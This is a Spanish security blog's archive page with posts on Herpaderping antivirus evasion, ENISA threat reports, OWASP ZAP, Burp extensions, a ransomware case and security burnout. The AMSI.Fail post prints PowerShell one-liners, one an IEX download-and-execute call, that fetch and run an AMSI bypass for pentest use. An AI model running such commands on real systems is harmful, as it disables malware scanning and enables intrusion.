3 dic 2020

Herpaderping: un vistazo simplificado (Parte I)

Por el 3 dic 2020 con 0 comentarios

Para los despistados, el 26 de octubre se hizo público un nuevo exploit de un "fallo de diseño" en Windows. Su autor, Johnny Shaw reportó la vulnerabilidad a Microsoft en julio de este año pero a día de hoy sigue sin ser parcheada porque Microsoft no considera que sea algo crítico (¯\_(ツ)_/¯). Esta técnica de explotación es muy similar a otras ya conocidas desde hace bastante tiempo, como Hollowing y Doppelganging, que permiten hacer pasar un proceso malicioso por uno legítimo. Es lo que se conoce como técnicas de evasión y ofuscación para ocultar malware. Si no os suenan, os recomiendo echar un ojo a estas últimas o al menos leer el apartado en el que el propio autor las compara.

Like y follow.

Cómo funciona

Aunque se trate de un exploit fácil de usar, siempre es importante entender lo que hay detrás. Básicamente, el exploit se aprovecha de una vulnerabilidad que reside en la secuencia de creación de un proceso en Windows. Muy (pero muy) por encima, la secuencia sería de esta forma: 
  • Primero se crea un objeto del proceso a partir del mapeo en memoria del código contenido en el fichero ejecutable. 
  • A continuación se inicia el hilo del proceso a partir de este objeto creado.
Tal y como el propio autor del exploit nos cuenta, es posible utilizar un archivo con un binario malicioso para mapear el contenido y crear el objeto del proceso, y sobrescribir inmediatamente después este archivo de origen con contenido legítimo antes de iniciar el hilo del proceso. Lo que se conoce popularmente como "dar el cambiazo". Pero, y aquí viene la parte graciosa, el objeto con la imagen cacheada del contenido malicioso ya está creado y es el que será utilizado en el proceso aunque se sobrescriba el ejecutable de origen. Aquí reside el quid del asunto, porque realmente siempre se ha pensado que el archivo conteniendo el ejecutable quedaría bloqueado, es decir sin poder modificarlo, mientras se crea el proceso.

Por otra parte, nos cuenta también el autor, existen antivirus (como Windows Defender) que inspeccionan la creación de un proceso para impedir la ejecución de procesos maliciosos. Sin embargo, la mayoría de ellos en realidad lo que están monitorizando es la creación del hilo inicial de un proceso, posterior a la creación del objeto en sí. No es hasta ese momento que inspeccionan el binario de origen para detectar código malicioso y, en ese caso, bloquear el proceso. Esto significa que se puede engañar al antivirus con el truco del cambiazo, ya que es posible sobrescribir el ejecutable antes de comenzar el hilo inicial del proceso. Al inspeccionar el binario de origen, el antivirus verá el fichero con el contenido ya reemplazado y no detectará nada extraño. En principio, se puede reemplazar el ejecutable malicioso por cualquier programa confiable que se nos ocurra. Por ejemplo, alguno firmado por Microsoft o Google. 

Además, hay que tener en cuenta que los antivirus también suelen monitorizar las operaciones de escritura de ficheros, lo que supondría un problema en este caso. Sin embargo, esto también lo tiene en cuenta el autor por lo que se ha asegurado que las operaciones de escritura se realicen en la misma rutina de control del archivo (file handle). Para ello, utiliza un archivo intermedio llamado "target" en el que escribe el código malicioso (se abre el handle), mapea el contenido para crear el objeto del proceso, sobrescribe el archivo con el código legítimo, crea el hilo del proceso y finalmente cierra el handle. Todo se realiza en ese orden concreto. Es en el momento de cerrar el handle cuando el antivirus va a inspeccionar el contenido del archivo "target", pero ya ha sido reemplazado, por lo que, de nuevo, no detectará nada extraño. El autor resume los pasos en: write -> map -> modify -> execute -> close.

Por lo tanto, el exploit de herpaderping nos permite ejecutar malware de forma fácil y sencilla sin ser detectados. Únicamente debemos proporcionar al exploit la ruta al ejecutable malicioso que queremos ejecutar, la ruta a un archivo cualquiera que se usará como "target", y la ruta a un programa confiable legítimo. Obviamente alguien ya ha tenido la idea de utilizarlo para ejecutar Mimikatz sin ser detectado por Windows Defender al hacerlo pasar por un programa firmado por Microsoft:

Me encanta la ironía de utilizar lsass.exe para "herpaderpear" Mimikatz.

En el próximo post veremos más en detalle cómo utilizar este exploit, qué opciones tiene, y en qué ocasiones tiene sentido utilizarlo. Si os interesa este tema, recomiendo leer detenidamente la explicación del propio autor en el README en GitHub.


Leer más
      editar

2 dic 2020

TOP 15 de Amenazas de ENISA - Malware

Por el 2 dic 2020 con 0 comentarios

Como ya os comentamos con anterioridad, ENISA ha publicado reciéntemente su análisis del Threat Landscape de 2020. Dentro de este análisis se ha publicado un informe técnico que revela el TOP 15 de cyber amenazas producidas, y en este post vamos a analizar el informe dedicado a la amenaza clasificada en la primera posición: el malware.


Para empezar, el informe nos indica que una de las amenazas malware que más prevalencia han tenido durante el periodo analizado son los criptomineros, revelando el impacto que esto ha producido a los equipos de IT, así como el aumento del consumo eléctronico provocado a las empresas y la reducción de la productividad que ha generado en los empleados. Por otro lado, nos avisa de que el ransomware está todavía en la parte baja de la lista.

Los principales vectores de ataque para extender el malware son la web y los correos electrónicos, y curiosamente aunque el nivel de detecciones se ha mantenido estable con respecto a otros años, sí que ha habido un cambio notable de objetivos dentro del mundo de los consumidores hacia objetivos empresariales, con un incremento de un 13% de detecciones en equipos Windows corporativos. No nos sorprenderá a muchos, pero más de un 70% de las organizaciones han sufrido ataques de malware que han conseguido moverse lateralmente a través de la compañía. Como ya se viene avisando desde hace mucho tiempo, la mayoría del malware hace uso de conexiones cifradas HTTPs, y de ahí la importancia de tener capacidad de inspección de tráfico cifrado si queremos detectar estas amenazas en nuestro perímetro.

La familia malware con más presencia ha sido Emotet, utilizada para desplegar muestras como Trickbot y Ryuk. Ni me acuerdo de los incidentes que hemos tenido que atender por culpa de estos tres. Como decíamos anteriormente, los atacantes están poniendo el foco en el mundo empresarial, por lo que la mayoría de familias de malware han desarrollado capacidades de movimiento lateral dentro de redes corporativas, más que buscar métodos de propagación por Internet.

Dentro de las tendencias que se están observando dentro del mundo del malware, se mencionan tanto el uso de Malware-as-a-Service (MaaS), como el malware fileless. El MaaS recordemos que simplemente se refiere al malware vendido por cibercriminales en foros underground, para que otros criminales lo utilicen en sus propias campañas. Generalmente los cibercriminales venden kits con las herramientas y la infraestructura necesaria para atacar a otras compañías a través de malware, incluyendo loaders, servidores de Comando y Control (C2) y el propio malware para controlar remotamente el equipo infectado. En cuanto al malware fileless, la mayoría de ataques están basados en scripts y ataques en memoria. El motivo del uso de estas técnicas es evidente, suelen tener una probabilidad de éxito muchísimo mayor al enfrentarse a una parte importante de los antivirus.

El tráfico de botnets también se vio incrementado un enorme 71.5% desde el 2018, siendo de nuevo Emotet y Trickbot dos de las más observadas. En relación a las comunicaciones, se ha detectado una importante caída en el uso de registros de dominios para pasar a otros protocolos de comunicación basados en P2P.

La gran mayoría de infecciones se producen vía correo. En el caso del fileless, se recomienda tener especial precaución con las extensiones tipo ".docx", en las que se introduce código dañino para comprometer el equipo destino.

Al final, se hace un resumen con las principales propuestas de mitigación, entre las que destacamos:

  1. Defensa en profundidad con detección antimalware en todas las vías de entrada y salida a la compañía: email, redes, web y todas las plataformas utilizadas (servidores, infraestructura de red, equipos corporativos, móviles, etc.)
  2. Inspección de tráfico SSL/TLS para permitir el análisis de las comunicaciones cifradas que atraviesan el perímetro.
  3. Establecer canales de comunicación efectivos entre la función de detección malware y los equipos de respuesta a incidentes, para dar una respuesta efectiva a estas situaciones.
  4. Utilizar las herramientas disponibles para análisis de malware para compartir información de malware y su posible mitigación (MISP)
  5. Desarrollar políticas y procedimientos de seguridad específicos que expliquen los procesos a seguir en caso de infección.
  6. Aplicar filtrado de correo para la detección de malware, e incluso, eliminando los adjuntos con ejecutables. 
  7. Revisar de forma periódica los resultados de los test antivirus.
  8. Monitorizar los logs utilizando soluciones SIEM que centralicen los resultados de consolas antivirus, sistemas EDR, proxies, eventos de Windows y Sysmon, IDS/IPS, etc.
  9. Reducir al máximo la posibilidad de acceder a funciones powershell y monitorizar su uso de forma intensiva.

En realidad y como podemos ver, el malware evoluciona pero las herramientas para protegernos y preparar a la compañía ya están ahí, y siguen siendo las mismas que existían hace tiempo. Defensa en profundidad, control de los canales de comunicación, reducción de la superficie de ataque, monitorización y políticas efectivas. La complejidad es la de siempre, conseguir desplegar toda este arsenal en grandes entornos altamente cambiantes y con presupuestos reducidos.

Nos vemos en el siguiente artículo, donde analizaremos el informe de ataques basados en web.

¡Saludos!

Leer más
      editar

1 dic 2020

Un CTF para pasar la Navidad

Por el 1 dic 2020 con 0 comentarios

 Meowy buenas!

Hoy os proponemos un reto para el mes de diciembre. La plataforma de tryhackme.com ha propuesto una serie de retos diarios para aprender conceptos y técnicas básicas de ciberseguridad, centrándose en los campos, como son: explotación web, networking, OSINT, scripting, reversing y blue team. Este CTF es gratuito y tiene una duración de 25 días, y además recibirás un certificado de participación tras completarlos. Lo más interesante de este proyecto es que si participas, cuantos más retos resuelvas, más posibilidades tendrás de ganar alguno de los siguientes premios:


En total son 57 premios de distinto valor, por lo que os animamos a registraros e ir intentando resolver estos pequeños desafíos a partir del 1 de Diciembre, y aprender en el camino.

Muchos maullidos!

M

Leer más

      editar

30 nov 2020

Burnout cybersecurity experts!

Por el 30 nov 2020 con 0 comentarios

Buenos días lectores. 

Hace poco me llegó el típico correo que suele llegar a la bandeja de entrada y que de primeras dudas entre borrarlo o ignorarlo. De hecho, no le presté demasiada atención y lo dejé sin leer para más adelante. Sin embargo, haciendo limpieza de la bandeja de entrada y después de una conversación que había tenido ese mismo día, me llamó la atención, porque es algo a lo que no le había prestado atención nunca, pero que veo en el día a día en compañeros del sector. Los profesionales de IT y en especial los que nos dedicamos a la ciberseguridad, estamos siempre estresados. Siempre he estado acostumbrado al estrés y he considerado que "va en el sueldo" y se tiene que vivir con ello. Sin embargo el día que vi este correo por segunda vez, había hablado con un excompañero (y buen amigo) con el que hacía mucho que no hablaba. Poniéndonos al día, me dijo que un conocido (40 años pelados) había muerto de un infarto, sin ninguna enfermedad ni patología previa. Resulta que el día de la fatídica defunción, mi amigo había coincidido con él en una reunión y le había visto demasiado alterado. El pobre hombre, le comentó que llevaba una temporada muy estresado y que se iba a ir antes a casa, para pasear por el campo y relajarse, que este trabajo iba a acabar con él. Por este motivo, me he decido a hacer este post a modo concienciación para todos nosotros. 

Según un estudio de 2018 de CSO, la ciberseguridad es una de las profesiones con más estrés y en el escenario actual, cada vez más. Alguno de los datos que se recogen en su encuesta son los siguientes: 

  • El 40% de los encuestados dijo que uno de los aspectos más estresantes de una carrera en ciberseguridad es mantenerse al día con las necesidades de seguridad de las nuevas iniciativas de TI. 
  • El 39% considera que es descubrir iniciativas/proyectos de TI que fueron iniciados por otros equipos dentro de mi organización sin supervisión de seguridad (cosa que todos sabemos que nunca pasa). 
Cualquiera que se dedica a la seguridad en algún momento de su carrera
Cuando te encuentras una nueva seta...
  • El 38% considera intentar que los usuarios finales comprendan los riesgos de la ciberseguridad y que cambien su comportamiento en consecuencia. 
  • El 37% que la empresa comprenda mejor los riesgos cibernéticos. 
  • El 36% considera la creciente carga de trabajo.

Y seguramente, el 99'9 % de nosotros, alguna vez hemos sentido estrés por algún motivo de estos. Por lo que son más comunes de lo que pensamos. 

El correo de la discordia

No sé cómo será y no conozco a ninguno de los ponentes, pero después de lo vivido y visto el panorama, creo que me tomaré un ratito el día 1 de diciembre para ver el Webinar de RSA, Mental Health for hackers.

Espero que os sea de utilidad a todos. 
Un saludo
Leer más
      editar

27 nov 2020

(JABBA) THE HUD: El interfaz de OWASP ZAP

Por el 27 nov 2020 con 0 comentarios



Buenas a todos/as, hace mucho tiempo (bueno en verdad hace no tanto) en una galaxia de internet muy lejana (bueno vale no tan lejana) aparecía un escáner de aplicaciones web de código abierto... hoy os vengo hablar esta vez, no sólo del escáner archi conocido de OWASP ZAP, si no su interfaz para hacer análisis incluido en el navegador. Para quien no lo conozca, o sea más de utilizar por ejemplo Burp Suite, HUD es una nueva interfaz con la que interactuar mientras hacemos trabajos de auditoría o pentesting web. La interfaz de HUD ya viene integrada en las últimas versiones de ZAP, de hecho desde la versión 2.8.

¿Pero que es un "HUD"? El acrónimo corresponde a "Heads Up Display" , es decir, una pantalla de visualización, muy presente en el mundo de la realidad aumentada, y muy utilizado en los coches de alta gama, que en este caso utilizan una imagen digital transparente que se proyecta en el parabrisas de un automóvil, ofreciéndonos información que nos puede dar el ordenador de a bordo del coche. Quedémonos con esta imagen, y cambiemos el parabrisas del automóvil por nuestro navegador Firefox.

Pongamos que ahora vamos a probar ZAP con la página de pruebas de Mutillidae, por lo que iniciamos ZAP normalmente. Previamente, en las opciones de Firefox habremos puesto en las opciones de proxy la dirección de loopback, o en su defecto si tenemos la extensión FoxyProxy lo haremos más rápido aún. 



Como recordatorio para el uso de ZAP y para que nos aparezca la interfaz de HUD y para usar el escáner en general, tendremos que importar al navegador el certificado. Para ello nos vamos a Herramientas y a opciones. Dentro de las opciones nos desplazamos hasta Certificados SSL Dinámicos:

Generar certificado para importar al navegador

A partir de aquí, lo que tendríamos que hacer es guardar el certificado e importarlo a Firefox, en el apartado de certificados, y agregarlo como Autoridad certificadora en Importar, y nos quedaría de la siguiente manera:



Una vez ya hemos configurado nuestro entorno (he querido hacer todos los pasos para la gente que no esté familiarizada con los escáneres proxy web) iniciamos OWASP ZAP:

Inicio de ZAP

Este es el escáner pero ahora cuando carguemos nuestra página objetivo en el navegador nos aparecerá lo siguiente:



Con lo que ya podríamos continuar haciendo nuestra auditoría de la página en el navegador. Si nos fijamos, a los dos lados de la pantalla nos aparecerán superpuestas, las opciones típicas de ZAP, por ejemplo, podríamos hacer un escáner desde aquí o hacer un crawler de la página:







Vamos ahora a explotar una vulnerabilidad a través del proxy, para ello, en la interfaz de la izquierda vamos a activar el on en Break, para poder interceptar la petición que queramos. 




Y ahora ya podemos interceptar la petición objetivo que queremos hacer, por ejemplo, para los XSS, en Lookup DNS solo tendríamos que pulsar:


Al pulsar en Lookup DNS nos aparecerá la petición a interceptar:


Es aquí donde podemos modificar la misma, con los parámetros que mandamos para insertar el típico script/alert de XSS:








La interfaz de HUD también nos brinda todo el árbol de la web que va capturando de forma pasiva, además del típico crawling (Spider o Ajax Spider) el cual podemos lanzar también desde el mando derecho de la interfaz.



El escáner pasivo de ZAP también nos irá proporcionando vulnerabilidades, como por ejemplo, falta de cabeceras de seguridad en la aplicación (como X-Frame que protege contra ataques de clickjacking), así como pistas de potenciales vulnerabilidades.


En definitiva, una funcionalidad de ZAP en las últimas versiones muy vistosa para poder analizar una aplicación web desde la propia página para echar un primer vistazo a sus vulnerabilidades, y además muy sencillo de usar y para toda la familia. ¿Qué os parece?.


¡Saludos!
Leer más
      editar

26 nov 2020

Ransomware transitivo

Por el 26 nov 2020 con 0 comentarios

Muy buenas a todos, hace unos días se conoció la noticia de un ataque de ransomware a una empresa privada llamada Vastaamo, la cual gestiona muchas clínicas de psicoterapia en Finlandia. Hasta acá nada nuevo, ya que últimamente este tipo de objetivos se ha vuelto muy común. Probablemente, al no tratarse de una empresa del rubro tecnológico, los ciberdelincuentes pueden sospechar que este tipo de empresa no priorice la seguridad de su información a la hora de destinar fondos o inversiones y por supuesto ¡ha sido este el caso y los malos han confirmado su teoría!

Luego de perpetrar el ataque, afectando cerca de 40.000 registros de pacientes que se atendían en alguna de las clínicas que esta empresa gestionaba, tal y como suele ser el modus operandi en este tipo de extorsiones, los ciberdelincuentes han pedido un rescate en bitcoins equivalente a 450.000 euros a la empresa afectada a cambio de la información. 


Sigmund Freud
viendo cómo tus informes psicológicos se difunden públicamente, mientras él ya se encargaba de ofuscar datos sensibles en los expedientes de cada uno de sus pacientes en el 1900

Pero lo curioso del caso es que luego se dirigieron a algunos de los pacientes afectados indicando que, como la empresa se había negado a pagar el rescate al no asumir errores propios al descuidar la información de sus clientes, les "ofrecían" la posibilidad de eliminar sus datos personales que habían sido secuestrados para que no sean filtrados públicamente, todo eso por cifras que rondaban entre los 200 y 500 euros, incluso el monto aumentaba conforme pasara el tiempo. Podríamos decir que se trata de un caso de ransomware transitivo o al menos de uno particular, ya que el rescate es pedido al titular de la información y no a la entidad encargada de custodiarla. Seguramente que nadie quiere (o al menos a mí no me gustaría) que sus registros psicológicos sean filtrados públicamente, incluso cuando tal vez ni siquiera sabemos qué digan esos registros sobre nosotros.

Finalmente, la empresa ha reconocido que vienen sufriendo ataques desde hace tiempo y que probablemente hayan sufrido intrusiones en sus datos desde fines de 2018. Este caso ha tomado relevancia, por la magnitud del hecho, y hasta el Ministerio del Interior de Finlandia ha tomado cartas en el asunto informando, a través de la cuenta de twitter de su ministra, que desde el gobierno están brindando asesoramiento a la empresa afectada e incluso define algunas directivas hacia los pacientes cuyos registros fueron afectados.

Mi finés está algo oxidado, pero según mi amigo traductor dice algo así: ¡La piratería del Centro de Psicoterapia Vastamo es impactante! @krp_poliisi investiga el caso como presunta intrusión agravada e invasión agravada de la privacidad.

Este caso me lleva (al menos) a reflexionar sobre la información sobre nosotros que puede andar por ahí, fuera de nuestro control, y que muchas veces confiamos en entidades, empresas o personas que no tiene el cuidado que nosotros mismos tendríamos sobre ese tipo de información. Está claro que hay empresas que no se interesan por la privacidad, ya que su negocio está enfocado en otras cuestiones "más redituables importantes". 

Ya para terminar con esta reflexión, considerando la informatización a ritmos agigantados que están experimentando muchas instuticiones gubernamentales o privadas, mayoritariamente del ámbito de la salud que se han adaptado sobre la marcha debido a la situación pandémica, considero fundamental poner el foco en la seguridad de la información, ya que probablemente muchas de ellas no estén preparadas para afrontar las amenazas cibernéticas actuales y que pueden afectarnos directamente.

¡Hasta el próximo post!

Leer más
      editar

25 nov 2020

TOP 15 de Amenazas de ENISA

Por el 25 nov 2020 con 0 comentarios

Recientemente mi compañero Daniel escribió sobre Threat Landscape 2020 de ENISA. En esta publicación se explican las principales amenazas cyber que se han producido desde enero de 2019 hasta abril de 2020. 

Como ya se mencionó, dentro del threat landscape realmente se han generado un compendio de informes de diferentes características y públicos objetivo. Dentro de los informes de carácter más técnico, se incluye el informe con el TOP 15 de cyber amenazas, y que según el orden definido por ENISA consta de los siguientes elementos:

El primer puesto se lo lleva el malware, aunque curiosamente el ransomware, a pesar de ser un tipo de malware, tiene una categoría propia que ocupa el puesto trece de la lista. Personalmente, creo que de todos los riesgos que se han reflejado, uno de los que mayores impactos produce y que más infravalorados está por numerosas compañías de nuestro país es el Insider Threat. De hecho, raro es el mes que, tras intentar reflejar el impacto que este tipo de situaciones puede provocar a la compañía, no nos encontremos ante argumentos de muy poco peso y que desde luego no van a servir de dique de protección en caso de que el riesgo se materialice.

En sucesivos posts vamos a ir extrayendo los datos más relevantes de cada uno de los informes, uno a uno, hasta completar la colección entera. Nos vemos en el siguiente post, donde analizaremos qué se dice sobre el malware.


Leer más
      editar

24 nov 2020

AMSI.Fail

Por el 24 nov 2020 con 0 comentarios

 ¡Buenas a todos!

En el artículo de hoy quería enseñaros una herramienta o utilidad que llevo bastante tiempo utilizando en algunos engagements. Si bien la herramienta no hace uso de ninguna técnica nueva para hacer un bypass de AMSI, lo que si hace es generar un bypass totalmente aleatorio. De esta forma, ningún payload tendrá la misma firma que otro. Para realizar esto, el creador de la herramienta @Flangvik, ha hecho uso de una Azure Function que genera un bypass de AMSI distinto cada vez que se invoca al método a través de una petición GET al recurso.


Actualmente, AMSI.fail hace uso de cuatro tipos de bypass:

Para facilitar el uso de la herramienta, el creador ha puesto a disposición de la comunidad un dominio llamado amsi.fail que hace de interfaz web para la Azure Function en cuestión. Permitiendo así, que cualquier usuario pueda copiar el payload con mayor facilidad.


Hay que tener en cuenta, que este bypass de AMSI, se realiza sobre el proceso donde se ejecuta el payload en cuestión, y que siempre se realiza en el contexto del usuario que lo ejecuta. Por ello, y para mayor comodidad en los engagements, os dejo dos comandos de PowerShell que llaman directamente a los métodos publicados de la Azure Function y evitan tener que acceder continuamente desde el navegador a la interfaz web.

$(Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/GenerateEnc).Content

IEX (New-Object Net.WebClient).DownloadString("https://amsi-fail.azurewebsites.net/api/Generate");


Si os ha gustado la herramienta no dudéis en echarle un vistazo y, añadirla a vuestro set de utilidades ;). De igual forma, os animo a que si queréis conocer en mayor detalle como funciona AMSI o la herramienta en cuestión, echéis un vistazo al repositorio donde encontraréis enlaces e información acerca de ello.

¡Saludos!

Leer más
      editar

23 nov 2020

No solo de Flu vive el hacker :)

Por el 23 nov 2020 con 1 comentario

Hola lectores. 

Hoy os voy a presentar cuatro newsletters/blogs de seguridad que yo sigo de manera regular y que me parecen muy útiles para estar informado de todo lo que pueda ir pasando en el mundillo de la ciberseguirdad a nivel internacional, aunque es cierto que la mayoría de ellos, se centran en USA.


El primero es SecurityWeekly. Aunque son parte de una compañía, sus blog y sus podcasts son de muy alto nivel, tratando multitud de temáticas y siendo muy activos en redes. Actualmente han montado un canal de Discord, con el que puedes intervenir directamente con ellos, aumentando la interactividad.  Han sido galardonados durante años con distintos premios por su contenido y su actividad formativa.

El segundo es el blog de ZackWhittaker, this week in security y es uno de mis favoritos. Se encarga de recopilar todo tipo de información reciente y relevante y está conformada por distintos apartados: THIS WEEK, TL;DR, donde están las noticias de la semana en sí, THE STUFF YOU MIGHT'VE MISSED, con noticias que pasaron desapercibidas anteriormente, THE HAPPY CORNER, con temas de humor relacionados con nuestro sector y THIS WEEK'S CYBER CAT, con fotos de gatos "ciber", que ya sabéis que en internet, los gatos siempre ayudan a tener visitas. 

Sumando visitas :)

El tercer canal de noticias que suelo seguir es ISACA SmartBrief. Desde el equipo de ISACA internacional, se dedican a recopilar las noticias de ciberseguridad que han salido publicadas en prensa y las categorizan por temáticas. De esta manera, tienes un pequeño resumen semanal de lo que ha sucedido, con la posibilidad de poder ampliar con un simple golpe de ratón el contenido. No suelen ser noticias tan técnicas como las que puedes encontrar en los otros blogs, pero suelen ser muy buenas para dar datos y estadísticas cuando alguien te intenta justificar que no necesita hacer nada en ciber.   




Y por último, os voy a hablar de Bruce Schneier. Para los que no sepáis quien es, es un criptógrafo, experto en seguridad informática, y autor de diversos libros de seguridad y criptografía. En su web tiene una newsletter, en la que habla de todo tipo de noticias que recopila del sector, desde hacking a cafeteras, hasta cómo funcionan los grupos cibercriminales. Son lecturas rápidas y entretenidas muy recomendables.


Supongo que muchas de ellas ya las conoceríais, pero si os he descubierto alguna que os pueda ser de utilidad, este post habrá merecido la pena. Eso si, no nos abandonéis para comenzar a seguir a estos compañeros, que hay contenido y conocimiento para todos ;)

Nos vemos pronto. 
Leer más
      editar

20 nov 2020

Burping in flavors

Por el 20 nov 2020 con 0 comentarios



¡Muy buenas a todos!

Hoy quería comentarles sobre cómo agregar extensiones a la herramienta más utilizada en auditorías web. ¡Eso es! tal y como se imaginarán, estoy hablando de nuestro querido Burp. En este post haremos una guía introductoria sobre cómo instalarlas, y si bien se trata de un proceso bastante sencillo (y hasta trivial), son muchos los beneficios que puede aportarnos, ya que con las extensiones de Burp podremos ampliar aún más el potencial de esta gran aplicación para casos de uso particulares y de esta forma agilizar nuestra auditoría.

Burp cuenta con un repositorio propio de extensiones, llamado BApp Store que nos permitirá instalarlas de una forma rápida y sencilla. En él se agrupan tanto desarrollos propios del equipo de Burp como de terceros que comparten sus creaciones con el resto de la comunidad. 

Podemos acceder a todos ellos seleccionando la opción correspondiente en la pestaña Extender dentro de la herramienta. Allí se nos mostrará un listado de todas las extensiones disponibles indicando, por ejemplo, Nombre, Popoularidad, Fecha de Última Actualización y Requisitos (cabe destacar que algunas de ellas requiren la edición Burp Suite Professional). En dicha tabla podremos aplicar distintos criterios de ordenación sobre las columnas, y en el panel lateral se nos ofrecerá información más detallada como Descripción, Autor, Versión, o algún otro aspecto que el autor haya considerado importante.

Realizar la instalación de una extensión es muy fácil ya que se trata de un proceso automático, basta con seleccionarla desde el listado y utilizar el botón indicado en el panel lateral. 

Instalando una extensión desde BApp Store

Una vez finalizado el proceso, veremos que se incluye una nueva pestaña en nuestra herramienta y es desde allí que podremos indicar los parámetros o configuraciones necesarias para poder utilizar nuestra nueva extensión. Podemos también instalar extensiones de forma manual desde la pestaña Extensions, para ellos debemos indicar el lenguaje de programación utilizado para desarrollar la extensión y seleccionar el archivo correspondiente. 

Las extensiones de Burp están principalmente desarrolladas en Java, aunque también existen algunas en Python o Ruby. En caso de querer instalar una extensión desarrollada en alguno de estos últimos, debemos descargar el intérprete Java para el lenguaje correspondiente (Jython o JRuby).

Si por ejemplo queremos agregar una extensión desarrollada en Python nos encontraremos con el botón de instalación desactivado, y con un mensaje que nos indica que debemos instalar el intérprete correspondiente.

La opción de Instalar se encuentra desactiva porque no contamos con el intérprete Java para Python

Al utilizar el botón se nos abrirá un navegador con la web oficial y desde allí descargaremos la versión StandAlone y la incorporaremos en la sección Python Environment dentro de la pestaña Options.

Agregamos el intérprete Jython en su versión StandAlone

Ahora se nos habilitará la opción y podremos instalar la extensión automáticamente para comenzar a utilizarla.
 

Ahora sí podemos instalar ;-)

Finalmente mencionar que desde esta misma pestaña podemos desactivar, desinstalar o incluso definir el orden en el que nuestras pestañas de extensiones son mostradas.

Desde acá podemos administrar las extensiones instaladas

En un futuro no muy lejano les contaremos sobre algunas extensiones interesantes que pueden ayudarnos en nuestras auditorías web. 

¡Hasta el próximo post! ¡Saludos!

Leer más
      editar
>